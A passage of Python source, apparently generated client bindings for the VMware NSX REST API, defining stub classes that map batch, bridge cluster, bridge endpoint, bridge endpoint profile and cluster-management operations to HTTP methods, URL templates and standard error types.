            'batch_request': type.ReferenceType('com.vmware.nsx.model_client', 'BatchRequest'),
            'atomic': type.OptionalType(type.BooleanType()),
        })
        # Maps canonical vAPI error ids to binding error types.
        create_error_dict = {
            'com.vmware.vapi.std.errors.service_unavailable':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
            'com.vmware.vapi.std.errors.invalid_request':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
            'com.vmware.vapi.std.errors.internal_server_error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
            'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
        }
        create_input_value_validator_list = [
        ]
        create_output_validator_list = [
        ]
        create_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/batch',
            request_body_parameter='batch_request',
            path_variables={
            },
            query_parameters={
                'atomic': 'atomic',
            },
            content_type='application/json'
        )
        operations = {
            'create': {
                'input_type': create_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'BatchResponse'),
                'errors': create_error_dict,
                'input_value_validator_list': create_input_value_validator_list,
                'output_validator_list': create_output_validator_list,
                'task_type': TaskType.NONE,
            },
        }
        rest_metadata = {
            'create': create_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.batch',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _BridgeClustersStub(ApiInterfaceStub):
    """
    Generated REST stub backing the ``BridgeClusters`` service
    (``com.vmware.nsx.bridge_clusters``). Declares the wire-level metadata
    (input struct types, error mappings and REST routing) for the CRUD +
    list operations on ``/api/v1/bridge-clusters``.
    """
    def __init__(self, config):
        # properties for create operation
        create_input_type = type.StructType('operation-input', {
            'bridge_cluster': type.ReferenceType('com.vmware.nsx.model_client', 'BridgeCluster'),
        })
        create_error_dict = {
            'com.vmware.vapi.std.errors.service_unavailable':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
            'com.vmware.vapi.std.errors.invalid_request':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
            'com.vmware.vapi.std.errors.internal_server_error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
            'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
        }
        create_input_value_validator_list = [
        ]
        create_output_validator_list = [
        ]
        create_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/bridge-clusters',
            request_body_parameter='bridge_cluster',
            path_variables={
            },
            query_parameters={
            },
            content_type='application/json'
        )
        # properties for delete operation
        delete_input_type = type.StructType('operation-input', {
            'bridgecluster_id': type.StringType(),
        })
        delete_error_dict = {
            'com.vmware.vapi.std.errors.service_unavailable':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
            'com.vmware.vapi.std.errors.invalid_request':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
            'com.vmware.vapi.std.errors.internal_server_error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
            'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
        }
        delete_input_value_validator_list = [
        ]
        delete_output_validator_list = [
        ]
        # Note: snake_case param maps to the hyphenated path segment.
        delete_rest_metadata = OperationRestMetadata(
            http_method='DELETE',
            url_template='/api/v1/bridge-clusters/{bridgecluster-id}',
            path_variables={
                'bridgecluster_id': 'bridgecluster-id',
            },
            query_parameters={
            },
            content_type='application/json'
        )
        # properties for get operation
        get_input_type = type.StructType('operation-input', {
            'bridgecluster_id': type.StringType(),
        })
        get_error_dict = {
            'com.vmware.vapi.std.errors.service_unavailable':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
            'com.vmware.vapi.std.errors.invalid_request':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
            'com.vmware.vapi.std.errors.internal_server_error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
            'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
        }
        get_input_value_validator_list = [
        ]
        get_output_validator_list = [
        ]
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/bridge-clusters/{bridgecluster-id}',
            path_variables={
                'bridgecluster_id': 'bridgecluster-id',
            },
            query_parameters={
            },
            content_type='application/json'
        )
        # properties for list operation
        # Standard optional paging/sorting parameters only.
        list_input_type = type.StructType('operation-input', {
            'cursor': type.OptionalType(type.StringType()),
            'included_fields': type.OptionalType(type.StringType()),
            'page_size': type.OptionalType(type.IntegerType()),
            'sort_ascending': type.OptionalType(type.BooleanType()),
            'sort_by': type.OptionalType(type.StringType()),
        })
        list_error_dict = {
            'com.vmware.vapi.std.errors.service_unavailable':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
            'com.vmware.vapi.std.errors.invalid_request':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
            'com.vmware.vapi.std.errors.internal_server_error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
            'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
        }
        list_input_value_validator_list = [
        ]
        list_output_validator_list = [
        ]
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/bridge-clusters',
            path_variables={
            },
            query_parameters={
                'cursor': 'cursor',
                'included_fields': 'included_fields',
                'page_size': 'page_size',
                'sort_ascending': 'sort_ascending',
                'sort_by': 'sort_by',
            },
            content_type='application/json'
        )
        # properties for update operation
        update_input_type = type.StructType('operation-input', {
            'bridgecluster_id': type.StringType(),
            'bridge_cluster': type.ReferenceType('com.vmware.nsx.model_client', 'BridgeCluster'),
        })
        update_error_dict = {
            'com.vmware.vapi.std.errors.service_unavailable':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
            'com.vmware.vapi.std.errors.invalid_request':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
            'com.vmware.vapi.std.errors.internal_server_error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
            'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
        }
        update_input_value_validator_list = [
        ]
        update_output_validator_list = [
        ]
        update_rest_metadata = OperationRestMetadata(
            http_method='PUT',
            url_template='/api/v1/bridge-clusters/{bridgecluster-id}',
            request_body_parameter='bridge_cluster',
            path_variables={
                'bridgecluster_id': 'bridgecluster-id',
            },
            query_parameters={
            },
            content_type='application/json'
        )
        # Operation table consumed by ApiInterfaceStub for dispatch.
        operations = {
            'create': {
                'input_type': create_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'BridgeCluster'),
                'errors': create_error_dict,
                'input_value_validator_list': create_input_value_validator_list,
                'output_validator_list': create_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'delete': {
                'input_type': delete_input_type,
                'output_type': type.VoidType(),
                'errors': delete_error_dict,
                'input_value_validator_list': delete_input_value_validator_list,
                'output_validator_list': delete_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'get': {
                'input_type': get_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'BridgeCluster'),
                'errors': get_error_dict,
                'input_value_validator_list': get_input_value_validator_list,
                'output_validator_list': get_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'list': {
                'input_type': list_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'BridgeClusterListResult'),
                'errors': list_error_dict,
                'input_value_validator_list': list_input_value_validator_list,
                'output_validator_list': list_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'update': {
                'input_type': update_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'BridgeCluster'),
                'errors': update_error_dict,
                'input_value_validator_list': update_input_value_validator_list,
                'output_validator_list': update_output_validator_list,
                'task_type': TaskType.NONE,
            },
        }
        rest_metadata = {
            'create': create_rest_metadata,
            'delete': delete_rest_metadata,
            'get': get_rest_metadata,
            'list': list_rest_metadata,
            'update': update_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.bridge_clusters',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _BridgeEndpointProfilesStub(ApiInterfaceStub):
    """
    Generated REST stub backing the ``BridgeEndpointProfiles`` service
    (``com.vmware.nsx.bridge_endpoint_profiles``). Declares the wire-level
    metadata (input struct types, error mappings and REST routing) for the
    CRUD + list operations on ``/api/v1/bridge-endpoint-profiles``.
    """
    def __init__(self, config):
        # properties for create operation
        create_input_type = type.StructType('operation-input', {
            'bridge_endpoint_profile': type.ReferenceType('com.vmware.nsx.model_client', 'BridgeEndpointProfile'),
        })
        create_error_dict = {
            'com.vmware.vapi.std.errors.service_unavailable':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
            'com.vmware.vapi.std.errors.invalid_request':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
            'com.vmware.vapi.std.errors.internal_server_error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
            'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
        }
        create_input_value_validator_list = [
        ]
        create_output_validator_list = [
        ]
        create_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/bridge-endpoint-profiles',
            request_body_parameter='bridge_endpoint_profile',
            path_variables={
            },
            query_parameters={
            },
            content_type='application/json'
        )
        # properties for delete operation
        delete_input_type = type.StructType('operation-input', {
            'bridgeendpointprofile_id': type.StringType(),
        })
        delete_error_dict = {
            'com.vmware.vapi.std.errors.service_unavailable':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
            'com.vmware.vapi.std.errors.invalid_request':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
            'com.vmware.vapi.std.errors.internal_server_error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
            'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
        }
        delete_input_value_validator_list = [
        ]
        delete_output_validator_list = [
        ]
        # Note: snake_case param maps to the hyphenated path segment.
        delete_rest_metadata = OperationRestMetadata(
            http_method='DELETE',
            url_template='/api/v1/bridge-endpoint-profiles/{bridgeendpointprofile-id}',
            path_variables={
                'bridgeendpointprofile_id': 'bridgeendpointprofile-id',
            },
            query_parameters={
            },
            content_type='application/json'
        )
        # properties for get operation
        get_input_type = type.StructType('operation-input', {
            'bridgeendpointprofile_id': type.StringType(),
        })
        get_error_dict = {
            'com.vmware.vapi.std.errors.service_unavailable':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
            'com.vmware.vapi.std.errors.invalid_request':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
            'com.vmware.vapi.std.errors.internal_server_error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
            'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
        }
        get_input_value_validator_list = [
        ]
        get_output_validator_list = [
        ]
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/bridge-endpoint-profiles/{bridgeendpointprofile-id}',
            path_variables={
                'bridgeendpointprofile_id': 'bridgeendpointprofile-id',
            },
            query_parameters={
            },
            content_type='application/json'
        )
        # properties for list operation
        # Optional service-specific filters plus standard paging/sorting.
        list_input_type = type.StructType('operation-input', {
            'cursor': type.OptionalType(type.StringType()),
            'edge_cluster_id': type.OptionalType(type.StringType()),
            'failover_mode': type.OptionalType(type.StringType()),
            'included_fields': type.OptionalType(type.StringType()),
            'page_size': type.OptionalType(type.IntegerType()),
            'sort_ascending': type.OptionalType(type.BooleanType()),
            'sort_by': type.OptionalType(type.StringType()),
        })
        list_error_dict = {
            'com.vmware.vapi.std.errors.service_unavailable':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
            'com.vmware.vapi.std.errors.invalid_request':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
            'com.vmware.vapi.std.errors.internal_server_error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
            'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
        }
        list_input_value_validator_list = [
        ]
        list_output_validator_list = [
        ]
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/bridge-endpoint-profiles',
            path_variables={
            },
            query_parameters={
                'cursor': 'cursor',
                'edge_cluster_id': 'edge_cluster_id',
                'failover_mode': 'failover_mode',
                'included_fields': 'included_fields',
                'page_size': 'page_size',
                'sort_ascending': 'sort_ascending',
                'sort_by': 'sort_by',
            },
            content_type='application/json'
        )
        # properties for update operation
        update_input_type = type.StructType('operation-input', {
            'bridgeendpointprofile_id': type.StringType(),
            'bridge_endpoint_profile': type.ReferenceType('com.vmware.nsx.model_client', 'BridgeEndpointProfile'),
        })
        update_error_dict = {
            'com.vmware.vapi.std.errors.service_unavailable':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
            'com.vmware.vapi.std.errors.invalid_request':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
            'com.vmware.vapi.std.errors.internal_server_error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
            'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
        }
        update_input_value_validator_list = [
        ]
        update_output_validator_list = [
        ]
        update_rest_metadata = OperationRestMetadata(
            http_method='PUT',
            url_template='/api/v1/bridge-endpoint-profiles/{bridgeendpointprofile-id}',
            request_body_parameter='bridge_endpoint_profile',
            path_variables={
                'bridgeendpointprofile_id': 'bridgeendpointprofile-id',
            },
            query_parameters={
            },
            content_type='application/json'
        )
        # Operation table consumed by ApiInterfaceStub for dispatch.
        operations = {
            'create': {
                'input_type': create_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'BridgeEndpointProfile'),
                'errors': create_error_dict,
                'input_value_validator_list': create_input_value_validator_list,
                'output_validator_list': create_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'delete': {
                'input_type': delete_input_type,
                'output_type': type.VoidType(),
                'errors': delete_error_dict,
                'input_value_validator_list': delete_input_value_validator_list,
                'output_validator_list': delete_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'get': {
                'input_type': get_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'BridgeEndpointProfile'),
                'errors': get_error_dict,
                'input_value_validator_list': get_input_value_validator_list,
                'output_validator_list': get_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'list': {
                'input_type': list_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'BridgeEndpointProfileListResult'),
                'errors': list_error_dict,
                'input_value_validator_list': list_input_value_validator_list,
                'output_validator_list': list_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'update': {
                'input_type': update_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'BridgeEndpointProfile'),
                'errors': update_error_dict,
                'input_value_validator_list': update_input_value_validator_list,
                'output_validator_list': update_output_validator_list,
                'task_type': TaskType.NONE,
            },
        }
        rest_metadata = {
            'create': create_rest_metadata,
            'delete': delete_rest_metadata,
            'get': get_rest_metadata,
            'list': list_rest_metadata,
            'update': update_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.bridge_endpoint_profiles',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _BridgeEndpointsStub(ApiInterfaceStub):
    """Client-side REST stub for the ``com.vmware.nsx.bridge_endpoints``
    interface: create/delete/get/list/update of bridge endpoints under
    ``/api/v1/bridge-endpoints``.
    """
    def __init__(self, config):
        def _std_errors():
            # Every operation on this interface declares the same five
            # standard vAPI errors; build a fresh dict per operation so each
            # operation owns an independent error map.
            return {
                'com.vmware.vapi.std.errors.service_unavailable':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
                'com.vmware.vapi.std.errors.invalid_request':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
                'com.vmware.vapi.std.errors.internal_server_error':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
                'com.vmware.vapi.std.errors.unauthorized':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
                'com.vmware.vapi.std.errors.not_found':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
            }

        def _model_ref(name):
            # Reference to a binding type in the NSX model package.
            return type.ReferenceType('com.vmware.nsx.model_client', name)

        # --- per-operation input struct types -------------------------------
        create_input_type = type.StructType('operation-input', {
            'bridge_endpoint': _model_ref('BridgeEndpoint'),
        })
        delete_input_type = type.StructType('operation-input', {
            'bridgeendpoint_id': type.StringType(),
        })
        get_input_type = type.StructType('operation-input', {
            'bridgeendpoint_id': type.StringType(),
        })
        list_input_type = type.StructType('operation-input', {
            'bridge_cluster_id': type.OptionalType(type.StringType()),
            'bridge_endpoint_profile_id': type.OptionalType(type.StringType()),
            'cursor': type.OptionalType(type.StringType()),
            'included_fields': type.OptionalType(type.StringType()),
            'logical_switch_id': type.OptionalType(type.StringType()),
            'page_size': type.OptionalType(type.IntegerType()),
            'sort_ascending': type.OptionalType(type.BooleanType()),
            'sort_by': type.OptionalType(type.StringType()),
            'vlan_transport_zone_id': type.OptionalType(type.StringType()),
        })
        update_input_type = type.StructType('operation-input', {
            'bridgeendpoint_id': type.StringType(),
            'bridge_endpoint': _model_ref('BridgeEndpoint'),
        })

        # --- per-operation REST wire metadata --------------------------------
        create_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/bridge-endpoints',
            request_body_parameter='bridge_endpoint',
            path_variables={},
            query_parameters={},
            content_type='application/json')
        delete_rest_metadata = OperationRestMetadata(
            http_method='DELETE',
            url_template='/api/v1/bridge-endpoints/{bridgeendpoint-id}',
            path_variables={'bridgeendpoint_id': 'bridgeendpoint-id'},
            query_parameters={},
            content_type='application/json')
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/bridge-endpoints/{bridgeendpoint-id}',
            path_variables={'bridgeendpoint_id': 'bridgeendpoint-id'},
            query_parameters={},
            content_type='application/json')
        # 'list' forwards every filter as a query parameter whose wire name
        # matches the Python parameter name.
        list_filter_names = [
            'bridge_cluster_id', 'bridge_endpoint_profile_id', 'cursor',
            'included_fields', 'logical_switch_id', 'page_size',
            'sort_ascending', 'sort_by', 'vlan_transport_zone_id',
        ]
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/bridge-endpoints',
            path_variables={},
            query_parameters={name: name for name in list_filter_names},
            content_type='application/json')
        update_rest_metadata = OperationRestMetadata(
            http_method='PUT',
            url_template='/api/v1/bridge-endpoints/{bridgeendpoint-id}',
            request_body_parameter='bridge_endpoint',
            path_variables={'bridgeendpoint_id': 'bridgeendpoint-id'},
            query_parameters={},
            content_type='application/json')

        # (name, input type, output type, REST metadata) — insertion order of
        # the resulting dicts matches the declaration order here.
        op_specs = (
            ('create', create_input_type, _model_ref('BridgeEndpoint'), create_rest_metadata),
            ('delete', delete_input_type, type.VoidType(), delete_rest_metadata),
            ('get', get_input_type, _model_ref('BridgeEndpoint'), get_rest_metadata),
            ('list', list_input_type, _model_ref('BridgeEndpointListResult'), list_rest_metadata),
            ('update', update_input_type, _model_ref('BridgeEndpoint'), update_rest_metadata),
        )
        operations = {}
        rest_metadata = {}
        for op_name, input_type, output_type, metadata in op_specs:
            operations[op_name] = {
                'input_type': input_type,
                'output_type': output_type,
                'errors': _std_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [],
                'task_type': TaskType.NONE,
            }
            rest_metadata[op_name] = metadata
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.bridge_endpoints',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _ClusterStub(ApiInterfaceStub):
    """Client-side REST stub for the ``com.vmware.nsx.cluster`` interface.

    Covers cluster configuration reads, node join/remove, remote backup /
    inventory-summary triggers, and proxied requests to individual cluster
    nodes (``create``/``delete``/``get_1``/``update``).
    """
    def __init__(self, config):
        def _errors(with_timed_out=False):
            # Standard five vAPI errors, built fresh per operation. The
            # node-proxy operations can additionally time out; the generated
            # bindings list TimedOut first, so insert it before the rest to
            # keep dict insertion order identical.
            errs = {}
            if with_timed_out:
                errs['com.vmware.vapi.std.errors.timed_out'] = \
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'TimedOut')
            errs['com.vmware.vapi.std.errors.service_unavailable'] = \
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable')
            errs['com.vmware.vapi.std.errors.invalid_request'] = \
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest')
            errs['com.vmware.vapi.std.errors.internal_server_error'] = \
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError')
            errs['com.vmware.vapi.std.errors.unauthorized'] = \
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized')
            errs['com.vmware.vapi.std.errors.not_found'] = \
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound')
            return errs

        def _target_input():
            # Input shape shared by all node-proxy operations.
            return type.StructType('operation-input', {
                'target_node_id': type.StringType(),
                'target_uri': type.StringType(),
            })

        def _model_ref(name):
            return type.ReferenceType('com.vmware.nsx.model_client', name)

        # Path-variable map shared by all node-proxy operations.
        _target_path_vars = {
            'target_node_id': 'target-node-id',
            'target_uri': 'target-uri',
        }

        # --- per-operation input struct types -------------------------------
        backuptoremote_input_type = type.StructType('operation-input', {})
        create_input_type = _target_input()
        delete_input_type = _target_input()
        get_input_type = type.StructType('operation-input', {})
        get_0_input_type = type.StructType('operation-input', {
            'node_id': type.StringType(),
        })
        get_1_input_type = _target_input()
        joincluster_input_type = type.StructType('operation-input', {
            'join_cluster_parameters': _model_ref('JoinClusterParameters'),
        })
        removenode_input_type = type.StructType('operation-input', {
            'node_id': type.StringType(),
            'force': type.OptionalType(type.StringType()),
            'graceful_shutdown': type.OptionalType(type.StringType()),
            'ignore_repository_ip_check': type.OptionalType(type.StringType()),
        })
        summarizeinventorytoremote_input_type = type.StructType('operation-input', {})
        update_input_type = _target_input()

        # --- per-operation REST wire metadata --------------------------------
        backuptoremote_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/cluster?action=backup_to_remote',
            path_variables={},
            query_parameters={},
            content_type='application/json')
        create_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/cluster/{target-node-id}/{target-uri}',
            path_variables=dict(_target_path_vars),
            query_parameters={},
            content_type='application/json')
        delete_rest_metadata = OperationRestMetadata(
            http_method='DELETE',
            url_template='/api/v1/cluster/{target-node-id}/{target-uri}',
            path_variables=dict(_target_path_vars),
            query_parameters={},
            content_type='application/json')
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/cluster',
            path_variables={},
            query_parameters={},
            content_type='application/json')
        get_0_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/cluster/{node-id}',
            path_variables={'node_id': 'node-id'},
            query_parameters={},
            content_type='application/json')
        get_1_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/cluster/{target-node-id}/{target-uri}',
            path_variables=dict(_target_path_vars),
            query_parameters={},
            content_type='application/json')
        joincluster_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/cluster?action=join_cluster',
            request_body_parameter='join_cluster_parameters',
            path_variables={},
            query_parameters={},
            content_type='application/json')
        # NOTE: the removenode query parameters use hyphenated wire names,
        # unlike most list-style filters in these bindings.
        removenode_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/cluster/{node-id}?action=remove_node',
            path_variables={'node_id': 'node-id'},
            query_parameters={
                'force': 'force',
                'graceful_shutdown': 'graceful-shutdown',
                'ignore_repository_ip_check': 'ignore-repository-ip-check',
            },
            content_type='application/json')
        summarizeinventorytoremote_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/cluster?action=summarize_inventory_to_remote',
            path_variables={},
            query_parameters={},
            content_type='application/json')
        update_rest_metadata = OperationRestMetadata(
            http_method='PUT',
            url_template='/api/v1/cluster/{target-node-id}/{target-uri}',
            path_variables=dict(_target_path_vars),
            query_parameters={},
            content_type='application/json')

        # (name, input type, output type, declares TimedOut, REST metadata)
        op_specs = (
            ('backuptoremote', backuptoremote_input_type, type.VoidType(), False, backuptoremote_rest_metadata),
            ('create', create_input_type, type.VoidType(), True, create_rest_metadata),
            ('delete', delete_input_type, type.VoidType(), True, delete_rest_metadata),
            ('get', get_input_type, _model_ref('ClusterConfig'), False, get_rest_metadata),
            ('get_0', get_0_input_type, _model_ref('ClusterNodeInfo'), False, get_0_rest_metadata),
            ('get_1', get_1_input_type, type.VoidType(), True, get_1_rest_metadata),
            ('joincluster', joincluster_input_type, _model_ref('ClusterConfiguration'), False, joincluster_rest_metadata),
            ('removenode', removenode_input_type, _model_ref('ClusterConfiguration'), False, removenode_rest_metadata),
            ('summarizeinventorytoremote', summarizeinventorytoremote_input_type, type.VoidType(), False, summarizeinventorytoremote_rest_metadata),
            ('update', update_input_type, type.VoidType(), True, update_rest_metadata),
        )
        operations = {}
        rest_metadata = {}
        for op_name, input_type, output_type, can_time_out, metadata in op_specs:
            operations[op_name] = {
                'input_type': input_type,
                'output_type': output_type,
                'errors': _errors(with_timed_out=can_time_out),
                'input_value_validator_list': [],
                'output_validator_list': [],
                'task_type': TaskType.NONE,
            }
            rest_metadata[op_name] = metadata
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.cluster',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _ClusterProfilesStub(ApiInterfaceStub):
    """Client-side REST stub for the ``com.vmware.nsx.cluster_profiles``
    interface: CRUD + list of polymorphic cluster profiles under
    ``/api/v1/cluster-profiles``.
    """
    def __init__(self, config):
        def _std_errors():
            # All five operations declare the same standard vAPI error set;
            # each call returns an independent dict instance.
            return {
                'com.vmware.vapi.std.errors.service_unavailable':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
                'com.vmware.vapi.std.errors.invalid_request':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
                'com.vmware.vapi.std.errors.internal_server_error':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
                'com.vmware.vapi.std.errors.unauthorized':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
                'com.vmware.vapi.std.errors.not_found':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
            }

        def _profile_struct():
            # ClusterProfile payloads are polymorphic, so they travel as a
            # dynamic struct constrained to have the fields of ClusterProfile;
            # hence the HasFieldsOfValidator entries below.
            return type.DynamicStructType(
                'vmware.vapi.dynamic_struct', {}, VapiStruct,
                [type.ReferenceType('com.vmware.nsx.model_client', 'ClusterProfile')])

        # --- per-operation input struct types -------------------------------
        create_input_type = type.StructType('operation-input', {
            'cluster_profile': _profile_struct(),
        })
        delete_input_type = type.StructType('operation-input', {
            'cluster_profile_id': type.StringType(),
        })
        get_input_type = type.StructType('operation-input', {
            'cluster_profile_id': type.StringType(),
        })
        list_input_type = type.StructType('operation-input', {
            'cursor': type.OptionalType(type.StringType()),
            'include_system_owned': type.OptionalType(type.BooleanType()),
            'included_fields': type.OptionalType(type.StringType()),
            'page_size': type.OptionalType(type.IntegerType()),
